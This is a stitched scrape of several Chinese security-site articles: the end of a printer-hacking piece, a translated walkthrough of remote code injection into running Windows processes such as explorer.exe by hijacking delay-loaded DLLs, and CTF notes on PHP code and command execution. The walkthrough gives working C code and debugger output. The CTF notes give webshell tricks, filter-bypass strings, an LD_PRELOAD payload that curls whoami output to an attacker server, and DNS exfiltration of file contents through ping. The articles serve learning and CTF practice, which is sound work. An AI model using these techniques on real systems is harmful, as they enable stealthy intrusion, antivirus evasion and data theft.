为什么打印机会被攻击?

大多数打印机已经和个人电脑或者服务器没什么区别了!

打印机可用作端口/网络/漏洞利用扫描器

用于计算/哈希破解/嗅探

用于上传恶意软件

用作C&C服务器

盗取未加密的数据

展望

如果我拿到一些更好的打印机,那么我将会继续在这些打印机上研究有关打印机漏洞利用的实验。如果我有更多的时间,我会投入更多的时间去研究对上述家用打印机的漏洞利用。例如捕获固件更新,并尝试对固件执行脱壳和逆向操作,但这些都需要投入更多的时间去研究和分析。所以我现在保持开放的心态,我希望上述的研究和分析能让我保持对打印机漏洞利用研究的兴趣。此外,我希望这篇文章能够帮助到那些对打印机漏洞利用感兴趣的人,并能够学习一些东西。所以如果你想研究自己的打印机设备,Just do it!不过请切记提醒:

找到进入系统的一种方式,

检查使用的打印机语言,并尝试上述这些代码注入技术,

尝试从Web界面dump文件系统目录结构,

如果可以,上传自己创建的“恶意”固件,

找到一种新的漏洞利用方法

最后,我期待着反馈和改进建议。

本文翻译自 0x00sec.org, 原文链接 。如若转载请注明出处。
安全知识

blueSky 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

PHP反序列化入门之寻找POP链(一)
2019-02-26 11:00:59

【缺陷周话】第23期:双重检查锁定
2019-02-26 10:00:40

2019安恒2月月赛Writeip-Web&Crypto&Misc
2019-02-25 16:00:20

安恒杯2019年2月月赛pwn部分详细分析
2019-02-25 15:30:46
|发表评论
发表你的评论吧
昵称
越南邻国宰相
换一个
|评论列表
加载更多
blueSky
这个人太懒了,签名都懒得写一个
文章
40
粉丝
0
TA的文章
【技术分享】详谈WAF与静态统计分析
2017-11-07 16:47:00
【技术分享】那些“躲避”微软autoruns工具的方法
2017-11-07 14:02:37
【技术分享】SnatchLoader恶意软件更新分析
2017-11-03 17:49:50
【技术分享】看我如何挖到谷歌Buganizer系统3个漏洞并获得15600美元赏金
2017-11-03 10:57:57
【技术分享】看我如何跨虚拟机实现Row Hammer攻击和权限提升
2017-11-01 17:27:14
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

src

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP
Previous
Next
热门活动
活动
招聘
招聘
最新动态
·【招聘】加入VIPKID安全中心,一起守护希望的未来!
·好未来教育集团招聘高级安全工程师
·众测|饿了么合作伙伴众测活动第一期开启!
·挖洞天使降临!MiSRC双倍金币活动开启!
·悬赏50万!小米智能生活安全守护计划启动

安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

dnsapi.dll

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP
【技术分享】利用DLL延迟加载实现远程代码注入
阅读量 52258 | 稿费 200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-09-25 13:54:22
译文声明
本文是翻译文章,文章原作者,文章来源:hatriot.github.io
原文地址:http://hatriot.github.io/blog/2017/09/19/abusing-delay-load-dll/

译文仅供参考,具体内容表达以及含义原文为准

×
http://p5.qhimg.com/t01decb9b5afc0bfba1.jpg

译者:shan66

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

在本文中,我们将为读者详细介绍一种新型的远程代码注入技术,实际上,这种技术是我在鼓捣延迟加载DLL时发现的。通过该技术,只要这些进程实现了本文所利用的功能:延迟加载DLL,攻击者可以将任意代码注入到正在运行的任何远程进程中。更准确的说,这并不是一个漏洞利用,而是一种潜入其他进程的策略。

现代的代码注入技术通常依赖于两个不同的win32 API调用的变体:CreateRemoteThread和NtQueueApc。然而,最近有人发表了一篇非常棒的文章[0],详细介绍了十种进程注入的方法。当然,这些方法并非都能注入到远程进程中,特别是那些已经在运行的进程,但那篇文章针对最常见的各种注入技术进行了非常细致的讲解,这一点是难能可贵的。而本文介绍的这个策略更像是inline hooking技术,不过我们没有用到IAT,并且也不要求我们的代码已经位于该进程中。我们不需要调用NtQueueApc或CreateRemoteThread,也不需要挂起线程或进程。但是,凡事都会或多或少有一些限制,具体情况将在后文中详细介绍。

延迟加载DLL

延迟加载是一种链接器策略,即允许延迟加载DLL。可执行文件通常会在运行时加载所有必需的动态链接库,然后执行IAT修复。 然而,延迟加载技术却允许这些库直到调用时才加载,为此,可以在第一次调时使用伪IAT进行修复处理。这个过程用下图来进行完美的阐释:

http://p8.qhimg.com/t0111450ce6b3b39dee.png

上图来自1998年Microsoft发布的一篇非常棒的文章[1],尽管该文所描述的策略已经非常棒了,但是这里我们会设法让它更上一个台阶。

通常PE文件中都含有一个名为IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT的数据目录,您可以使用dumpbin/imports或windbg进行查看,其结构描述详见delayhlp.cpp中,读者可以在WinSDK中找到它:

struct InternalImgDelayDescr {
DWORD grAttrs; // attributes
LPCSTR szName; // pointer to dll name
HMODULE * phmod; // address of module handle
PImgThunkData pIAT; // address of the IAT
PCImgThunkData pINT; // address of the INT
PCImgThunkData pBoundIAT; // address of the optional bound IAT
PCImgThunkData pUnloadIAT; // address of optional copy of original IAT
DWORD dwTimeStamp; // 0 if not bound,
// O.W. date/time stamp of DLL bound to (Old BIND)
};
这个表内存放的是RVA,而不是指针。 我们可以通过解析文件头来找到延迟目录的偏移量:

0:022> lm m explorer
start end module name
00690000 00969000 explorer (pdb symbols)
0:022> !dh 00690000 -f
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
[…]
68A80 [ 40] address [size] of Load Configuration Directory
0 [ 0] address [size] of Bound Import Directory
1000 [ D98] address [size] of Import Address Table Directory
AC670 [ 140] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory
第一个entry及其延迟链接的DLL可以在以下内容中看到:

0:022> dd 00690000+ac670 l8
0073c670 00000001 000ac7b0 000b24d8 000b1000
0073c680 000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0
0073c7b0 “WINMM.dll”
这意味着WINMM是动态地链接到explorer.exe的,由于是延迟加载,所以在导入的函数被调用之前,它是不会被加载到进程中的。一旦加载,帮助函数将通过使用GetProcAddress来定位目标函数并在运行时修复这个表,从而完成IAT的修复工作。

引用的伪IAT与标准PE IAT是分开的;该IAT专用于延迟加载功能,并通过延迟描述符进行引用。例如,就WINMM.dll来说,WINMM的伪IAT为RVA 000b1000。第二个延迟描述符entry的伪IAT具有单独的RVA,其他依此类推。

下面我们使用WINMM来说明延迟加载,资源管理器会从WINMM中导入一个函数,即PlaySoundW。在我实验中,它没有被调用,所以伪IAT还没有修复。 我们可以通过转储的伪IAT条目来查看这一点:

0:022> dps 00690000+000b1000 l2
00741000 006dd0ac explorer!_imp_load__PlaySoundW
00741004 00000000
这里,每个DLL条目都是以null结尾的。上面的指针告诉我们,现有的条目只是在Explorer进程中的跳板。这需要我们:

0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400 mov eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00 jmp explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51 push ecx
006dd0b4 52 push edx
006dd0b5 50 push eax
006dd0b6 6870c67300 push offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff call explorer!__delayLoadHelper2 (006b3ce9)
tailMerge函数是一个链接器生成的存根,它在每个DLL中编译,而不是每个函数。 __delayLoadHelper2函数是处理伪IAT的加载和修补的magic。根据delayhlp.cpp可知,该函数用来处理LoadLibrary/GetProcAddress调用以及修复伪IAT。为了便于演示,我编译了一个延迟链接dnslib的二进制文件。下面是DnsAcquireContextHandle的解析过程:

0:000> dps 00060000+0001839c l2
0007839c 000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0 00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000 C:Windowssystem32apphelp.dll
Breakpoint 0 hit
[…]
0:000> dd esp+4 l1
0024f9f4 00075ffc
0:000> dd 00075ffc l4
00075ffc 00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0
00070fb0 “DNSAPI.dll”
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c 74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0 00000000
现在伪IAT条目已被修复,这样在后续调用中就能调用正确的函数了。这样,伪IAT就同时具有可执行和可写属性:

0:011> !vprot 00060000+0001839c
BaseAddress: 00371000
AllocationBase: 00060000
AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY
此时,DLL已经加载到进程中,伪IAT也已修复。当然,并不是所有的函数都能够在加载时进行解析,相反,只有被调用的函数才能这样。 这会让伪IAT中的某些条目处于混合状态:

00741044 00726afa explorer!_imp_load__UnInitProcessPriv
00741048 7467f845 DUI70!InitThread
0074104c 00726b0f explorer!_imp_load__UnInitThread
00741050 74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start end module name
74630000 746e2000 DUI70 (pdb symbols)
从上面可以看到,这里只是解析了了四个函数中的两个,并将DUI70.dll库加载到了该进程中。在延迟加载描述符的每个条目中,被引用的结构都会为HMODULE维护一个RVA。 如果模块未加载,它将为空。 所以,当调用已经加载的延迟函数时,延迟助手函数将检查它的条目以确定是否可以使用它的句柄:

HMODULE hmod = *idd.phmod;
if (hmod == 0) {
if (__pfnDliNotifyHook2) {
hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
}
if (hmod == 0) {
hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
}
idd结构只是上述InternalImgDelayDescr的一个实例,它将会从链接器tailMerge存根传递给__delayLoadHelper2函数。因此,如果该模块已经被加载,当从延迟条目引用时,它将使用该句柄。

这里另一个注意事项是,延迟加载器支持通知钩子。有六个状态可以供我们挂钩:进程启动,预加载库,加载库出错,预取GetProcAddress,GetProcAddress失败和结束进程。你可以在上面的代码示例中看到钩子的具体用法。

最后,除了延迟加载外,PE文件还支持库的延迟卸载。当然,了解了库的延迟加载后,库的延迟卸载就不用多说了。

DLL延迟加载技术的局限性

在详细说明我们如何利用DLL延迟加载之前,我们首先来了解一下这种技术的局限性。它不是完全可移植的,并且单纯使用延迟加载功能无法实现我们的目的。

它最明显的局限性在于,该技术要求远程进程被延迟链接。我在自己的主机上简单抓取一些本地进程,它们大部分都是一些Microsoft应用程序:dwm,explorer,cmd。许多非Microsoft应用程序也是如此,包括Chrome。 此外,由于PE格式受到了广泛的支持,所以在许多现代系统上都能见到它的身影。

另一个限制,是它依赖于LoadLibrary,也就是说磁盘上必须存在一个DLL。我们没有办法从内存中使用LoadLibrary。

除了实现延迟加载外,远程进程必须实现可以触发的功能。我们需要获取伪IAT,而不是执行CreateRemoteThread、SendNotifyMessage或ResumeThread,因此我们必须能够触发远程进程来执行该操作/执行该功能。如果您使用挂起进程/新建进程策略,虽然这本身并不难,但运行应用程序可能并不容易。

最后,任何不允许加载无符号库的进程都能阻止这种技术。这种特性是由ProcessSignaturePolicy控制的,可以使用SetProcessMitigationPolicy [2]进行相应设置;目前还不清楚有多少应用程序正在使用这些应用程序,但是Microsoft Edge是第一个采用该策略的大型产品之一。此外, 该技术也受到ProcessImageLoadPolicy策略的影响,该策略可以设置为限制从UNC共享加载图像。

利用方法

当讨论将代码注入到进程中的能力时,攻击者可能会想到三种不同的情形,以及远程进程中的一些额外的情况。本地进程注入只是在当前进程中执行shellcode /任意代码。挂起的进程是从现有的受控的进程中产生一个新的挂起的进程,并将代码注入其中。这是一个相当普遍的策略,可以在注入之前迁移代码,建立备份连接或创建已知的进程状态。最后一种情形是运行远程进程。

运行远程进程是一个有趣的情况,我们将在下面探讨其中的几个注意事项。我不会详细介绍挂起的进程,因为它与利用运行的进程的方法基本相同,并且更容易。之所以很容易,因为许多应用程序实际上只在运行时加载延迟库,或者由于该功能是环境所需,或者因为需要链接另一个加载的DLL。这方面的源代码实现请参考文献[3]。

本地进程

本地进程是这个策略中最简单和最有用的一种方式。 如果我们能够以这种方式来注入和执行代码的话,我们也可以链接到我们想要使用的库。我们需要做的第一件事是延迟链接可执行文件。由于某些原因,我最初选择了dnsapi.dll。 您可以通过Visual Studio的链接器选项来指定延迟加载DLL。

因此,我们需要获取延迟目录的RVA,这可以通过以下函数来完成:

IMAGE_DELAYLOAD_DESCRIPTOR*
findDelayEntry(char *cDllName)
{
PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos +
pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;
// iterate over entries
for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
if (strcmp(_cDllName, cDllName) == 0){
pImgResult = entry;
break;
}
}
return pImgResult;
}
得到了相应的表项后,我们需要将条目的DllName标记为可写,用我们的自定义DLL名称覆盖它,并恢复保护掩码:

IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry(“DNSAPI.dll”);
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);
现在要做的就是触发目标函数。一旦触发,延迟助手函数将从表条目中阻断DllName,并通过LoadLibrary加载DLL。

远程进程

最有趣的方法是运行远程进程。我们将通过explorer.exe进行演示,因为它最为常见。

为了打开资源管理器进程的句柄,我们必须执行与本地进程相同的搜索任务,但这一次是在远程进程中进行的。虽然这有点麻烦,但相关的代码可以从文献[3]的项目库中找到。实际上,我们只需抓取远程PEB,解析图像及其目录,并找到我们所感兴趣的延迟条目即可。

当尝试将其移植到另一个进程时,这部分可能是最不友好的;我们的目标是什么?哪个函数或延迟加载条目通常不会被使用,并且可从当前会话触发?对于资源管理器来说,有多个选择;它延迟链接到9个不同的DLL,每个平均有2-3个导入函数。幸运的是,我看到的第一个函数是非常简单:CM_Request_Eject_PC。该函数是由CFGMGR32.dll导出的,作用是请求系统从本地坞站[4]弹出。因此,我们可以假设在用户从未明确要求系统弹出的情况下,它在工作站上是可用的。

当我们要求工作站从坞站弹出时,该函数发送PNP请求。我们使用IShellDispatch对象来执行该操作,该对象可以通过Shell访问,然后交由资源管理器进行处理。

这个代码其实很简单:

HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;
CoInitialize(NULL);
hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER,
IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
pIShellDispatch->EjectPC();
pIShellDispatch->Release();
}
CoUninitialize();
我们的DLL只需要导出CM_Request_Eject_PC,这不会导致进程崩溃;我们可以将请求传递给真正的DLL,也可以忽略它。所以,我们就能稳定可靠完成远程代码注入了。

远程进程

一个有趣的情况是要注入的远程进程需延迟加载,但所有导入的函数都已在伪IAT中完成解析了。这就有点复杂了,但也不是完全没有希望。

还记得前面提到的延迟加载库的句柄是否保留在其描述符中吗?帮助函数就是通过检查这个值以确定是否应该重新加载模块的;如果其值为null,就会尝试加载模块,如果不是,它就使用该句柄。我们可以通过清空模块句柄来滥用该检查,从而”欺骗”助手函数,让它重新加载该描述符的DLL。

然而,对于讨论的这种情况来说,伪IAT已经被完全修复了;所以无法将更多的“跳板”可以放入延迟加载帮助函数。 在默认情况下,伪IAT是可写的,所以我们可以直接修改跳板函数,并用它来重新实例化描述符。 简而言之,这种最坏情况下的策略需要三个独立的WriteProcessMemory调用:一个用于清除模块句柄,一个用于覆盖伪IAT条目,一个用于覆盖加载的DLL名称。

结束语

前面说过,我曾经针对下一代AV/HIPS(具体名称这里就不说了)测试过这个策略,它们没有一个能够检测到交叉进程注入策略。针对这种策略的检测看上去是一个有趣的挑战;在远程进程中,策略使用以下调用链:

OpenProcess(..);
ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table
ReadRemoteProcess(..); // read delay entry 1…n
VirtualProtectEx(..);
WriteRemoteProcess(..);
触发功能在每个进程之间都是动态的,所有加载的库都是通过一些大家熟知的Windows设备来加载。此外,我还检查了其他一些核心的Windows应用程序,它们都有非常简单的触发策略。

引用的文献[3]提供了对于x86和x64系统的支持,并已在Windows 7,8.1和10中通过了测试。它涉及三个函数:inject_local,inject_suspended和inject_explorer。它通过会到C: Windows Temp TestDLL.dll查找该DLL,但这显然是可以更改的。

特别感谢Stephen Breen审阅了这篇文章。

参考文献

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx

[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx

[3] https://github.com/hatRiot/DelayLoadInject

[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

本文翻译自 hatriot.github.io, 原文链接 。如若转载请注明出处。
安全知识

shan66 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

PHP反序列化入门之寻找POP链(一)
2019-02-26 11:00:59

【缺陷周话】第23期:双重检查锁定
2019-02-26 10:00:40

2019安恒2月月赛Writeip-Web&Crypto&Misc
2019-02-25 16:00:20

安恒杯2019年2月月赛pwn部分详细分析
2019-02-25 15:30:46
|发表评论
发表你的评论吧
昵称
匿名用户
换一个
|评论列表
加载更多
shan66
这个人太懒了,签名都懒得写一个
文章
104
粉丝
3
TA的文章
【技术分享】获取SYSTEM权限的多种姿势
2017-11-22 15:28:16
【技术分享】以Emotet为例识别C2服务器并掌握其拓扑结构
2017-11-15 14:01:41
【技术分享】CVE-2017-8715:PowerShell模块清单文件绕过安全补丁
2017-11-13 10:58:17
【技术分享】黑客组织APT28利用DDE漏洞与纽约袭击事件发动攻击
2017-11-13 09:59:59
【技术分享】深入分析REDBALDKNIGHT组织具备隐写功能的Daserf后门
2017-11-10 14:58:12
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

运行 命令

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP
命令执行与代码执行的小结
阅读量 125055 | 评论 4 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-10-20 09:30:56

前记
总结了一下在ctf里经常遇到的命令执行和代码执行的利用点。

代码执行
执行代码的几种方式
${}执行代码
eval
assert
preg_replace
create_function()
array_map()
call_user_func()/call_user_func_array()
array_filter()
usort(),uasort()
${}执行代码

${php代码}

${phpinfo()};
eval()执行代码

eval(‘echo 2;’);
assert()

普通调用

//?a=phpinfo()

assert函数支持动态调用

//?a=phpinfo()

php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。

以上两种调用方法在php7.0.29版本之前都测试成功,7.0.29版本之后又动态调用的方法无法成功。

在7.0.29版本之后发现的奇怪的一点


//phpinfo()无法执行成功

//成功执行phpinfo()
preg_replace()

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
preg_replace 执行一个正则表达式的搜索和替换。

执行代码需要使用/e修饰符。如果不使用/e修饰符,代码则不会执行

$a = ‘phpinfo()’;
$b = preg_replace(“/abc/e”,$b,’abcd’);
create_function()

说明

string create_function ( string $args , string $code )
该函数用来创建匿名函数。
这个函数的实现大概是这样的

$b = create_function(‘$name’,’echo $name;’);
//实现
function niming($name){
echo $name;
}

$b(yang);

niming(‘yang’);
第二个参数是执行代码的地方,将payload放在第二个参数的位置,然后调用该函数就可以执行payload了。
执行代码

$a = ‘phpinfo();’;
$b = create_function(” “,$a);
$b();
上面这种方法是最直接的,接下来看一点有趣的。

自己写的小示例

$id=$_GET[‘id’];

$code = ‘echo $name. ‘.’的编号是’.$id.’; ‘;

$b = create_function(‘$name’,$code);
//实现
function niming($name){
echo $name.”编号”.$id;
}
$b(‘sd’);
这里直接传入phpinfo是不行的,构造的payload

?id=2;}phpinfo();/*
传入后,代码如下

function niming($name){
echo $name.编号2;
}phpinfo();/*
}
这样就执行了代码,再给出网上找的一个例子。


构造的payload如下

?sort_by=”]);}phpinfo();/*
在自己写示例的时候,因为网上的一个示例纠结了挺久。
代码如下

“;
echo “==============================”;
echo “
“;
$f1 = create_function(‘$a’,$str2);
echo “
“;
echo “==============================”;
?>
纠结的原因是在这个例子中,构造$str2的时候,将变量a和变量b都写在了引号之外,但是变量a是匿名函数的参数,如果直接写在单引号外面的话,解析的时候会认为$a没有赋值,从而设置为空。继续往下看,匿名函数也就无法正常的执行。所以就在想办法将$a写在单引号里面,使其可以正常的作为匿名函数的第二个参数。

本应该挺容易的事儿,但是改来改去花了好久。最终的结果便是开头写的示例。

array_map()

官方文档

array array_map ( callable $callback , array $array1 [, array $… ] )
array_map():返回数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。
漏洞演示

//?a=assert&b=phpinfo();
$a = $_GET[‘a’];
$b = $_GET[‘b’];
$array[0] = $b;
$c = array_map($a,$array);
call_user_func()/call_user_func_array()

和array_map()函数挺像的。

官方文档

call_user_func()

mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $… ]] )
第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。
call_user_func_array()

mixed call_user_func_array ( callable $callback , array $param_arr )
把第一个参数作为回调函数(callback)调用,把参数数组作(param_arr)为回调函数的的参数传入。
示例
call_user_func()

// ?a=phpinfo();
call_user_func(assert,$_GET[‘a’]);
call_user_func_array()

//?a=phpinfo();
$array[0] = $_GET[‘a’];

call_user_func_array(“assert”,$array);
array_filter()

官方文档

array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。
示例

$array[0] = $_GET[‘a’];
array_filter($array,’assert’);
usort()/uasort()

usrot官方文档

bool usort ( array &$array , callable $value_compare_func )
本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数。
shell_1


只有在php5.6以上环境才可使用
详解

关于…$_GET是php5.6引入的新特性。即将数组展开成参数的形式。

shell_2

下面这种写法只在php5.6版本以下可以使用。

// ?1=1+1&2=phpinfo();
usort($_GET,’asse’.’rt’);

命令执行
常见命令执行函数
system()
passthru()
exec()
shell_exec()
`反引号
ob_start()
mail函数+LD_PRELOAD执行系统命令
system()

? ~ php -r “system(‘whoami’);”
yang
passthru()

? ~ php -r “passthru(‘whoami’);”
yang
exec()

? ~ php -r “echo exec(‘whoami’);”
yang%
shell_exec()

? ~ php -r “echo shell_exec(‘whoami’);”
yang
`反引号

? ~ php -r “echo @`whoami`;”
yang%
ob_start()

官方文档

bool ob_start ([ callback $output_callback [, int $chunk_size [, bool $erase ]]] )
此函数将打开输出缓冲。当输出缓冲激活后,脚本将不会输出内容(除http标头外),相反需要输出的内容被存储在内部缓冲区中。

内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中。 想要输出存储在内部缓冲区中的内容,可以使用 ob_end_flush() 函数。另外, 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容。
使用


//输出www-data
mail函数+LD_PRELOAD执行系统命令

思路

LD_PRELOAD可以用来设置程序运行前优先加载的动态链接库,php函数mail在实现的过程中会调用标准库函数,通过上传一个编译好的动态链接程序(这个程序中重新定义了一个mail函数会调用的库函数,并且重新定义的库函数中包含执行系统命令的代码。),再通过LD_PRELOAD来设置优先加载我们的上传的动态链接程序,从而实现命令执行。

利用

a.c

#include
#include
#include
int main(){

void payload() {
system(“curl http://vps_IP:4123/?a=`whoami`”);
}
int geteuid() {
if (getenv(“LD_PRELOAD”) == NULL) { return 0; }
unsetenv(“LD_PRELOAD”);
payload();
}
}
编译

gcc -c -fPIC a.c -o a

gcc -shared a -o a.so
mail.php


监听vps的4123端口,访问mail.php。

ctf绕过的小tip
空格

在bash下,可以用以下字符代替空格

< ${IFS} $IFS$9 %09 测试 ubuntu@VM-0-8-ubuntu:~/shell$ cat<1.txt abc ubuntu@VM-0-8-ubuntu:~/shell$ cat${IFS}1.txt abc ubuntu@VM-0-8-ubuntu:~/shell$ cat$IFS$91.txt abc %09测试

//http://127.0.0.1/45.php?cmd=cat%091.txt
//输出abc
敏感字符绕过

这里假设过滤了cat

利用变量绕过
ubuntu@VM-0-8-ubuntu:~/shell$ a=c;b=a;c=t;
ubuntu@VM-0-8-ubuntu:~/shell$ $a$b$c 1.txt
abc
利用base编码绕过
ubuntu@VM-0-8-ubuntu:~/shell$ echo ‘cat’ | base64
Y2F0Cg==
ubuntu@VM-0-8-ubuntu:~/shell$ `echo ‘Y2F0Cg==’ | base64 -d` 1.txt
abc
处理无回显的命令执行
1.利用自己的vps

在vps上使用nc监听

? ~ nc -lnvp 4567
Listening on [0.0.0.0] (family 0, port 4567)
后台代码


paylaod

curl http://vps_ip/?id=`whoami`
收到回显
1

2.利用ceye平台

平台的payload

记录在http request中

题目地址

http://192.168.10.55/
后台源码


payload

curl http://192.168.10.55.o40fok.ceye.io/?id=`whoami`
只能使用linux的curl访问才会成功,在浏览器直接访问时无效的。
效果

图1
2

记录在dns query中

简单介绍

DNS在解析的时候是逐级解析的,并且会留下日志,所以可以将回显放在高级域名,这样在解析的时候就会将回显放在高级域名中,我们就可以在dns query中看到回显。
举个例子

在注册ceye.io之后会分配一个三级域名。就是**.ceye.io。

ping `whoami`.******.ceye.io
上面这条命令最终在ping的时候ping的是“root.**.ceye.io”,root就是我们构造的恶意命令执行的结果,我们把它放在四级域名这里,这样在DNS解析的时候就会记录下root这个四级域名。然后可以在ceye平台上看到我们的dns解析日志。也就看到了命令执行的回显。(个人理解,如有错误,烦请指出。)

所以这种方法的使用必须有ping命令。

真题解析

题目存在robots.txt文件,访问发现两个文件

index.txt
where_is_flag.php
index.php代码

“,”0.0”,$ip);
system(“ping “.$ip);
可以看到存在ping命令,但是测试没有回显,于是就采用dnslog的方式来查看回显。
payload

ping `cat where_is_flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io
# 因为域名中不允许有空格,但是php代码中可能会含有空格,所以使用sed命令将php代码的空格替换为xx
最终的url

http://192.168.5.90/?ping=`cat where_is_flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io
在dns query中查看

图2
3

可以看到文件的内容是


由此得知flag.php的位置,继续打印flag.php的内容
获取flag的url

http://192.168.5.90/?ping=`cat dgfsdunsadkjgdgdfhdfhfgdhsadf/flag.php|sed s/[[:space:]]/xx/g`.******.ceye.io
图三

4
得到flag。

后记
从开始学打ctf到现在见了挺多的代码执行和命令执行,这次算比较完整的总结了一下,感觉对于我这种萌新还是挺友好的。欢迎师傅们指出不对的地方。

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/162128
安全客 – 有思想的安全新媒体
CTF Web安全

Yang1k 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

PHP反序列化入门之寻找POP链(一)
2019-02-26 11:00:59

【缺陷周话】第23期:双重检查锁定
2019-02-26 10:00:40

2019安恒2月月赛Writeip-Web&Crypto&Misc
2019-02-25 16:00:20

安恒杯2019年2月月赛pwn部分详细分析
2019-02-25 15:30:46
|发表评论
发表你的评论吧
昵称
大表姐
换一个
|评论列表
加载更多
Yang1k
成长ing.
文章
2
粉丝
0
TA的文章
SQL注入的两个小Trick与总结
2018-10-31 11:30:30
命令执行与代码执行的小结
2018-10-20 09:30:56
输入关键字搜索内容
相关文章
PHP反序列化入门之寻找POP链(一)
2019安恒2月月赛Writeip-Web&Crypto&Misc
安恒杯2019年2月月赛pwn部分详细分析
CTF中32位程序调用64位代码的逆向方法
WordPress 5.0 RCE 详细分析
某php开源cms有趣的二次注入
三层网络靶场搭建&MSF内网渗透
热门推荐
文章目录
前记
代码执行
执行代码的几种方式
命令执行
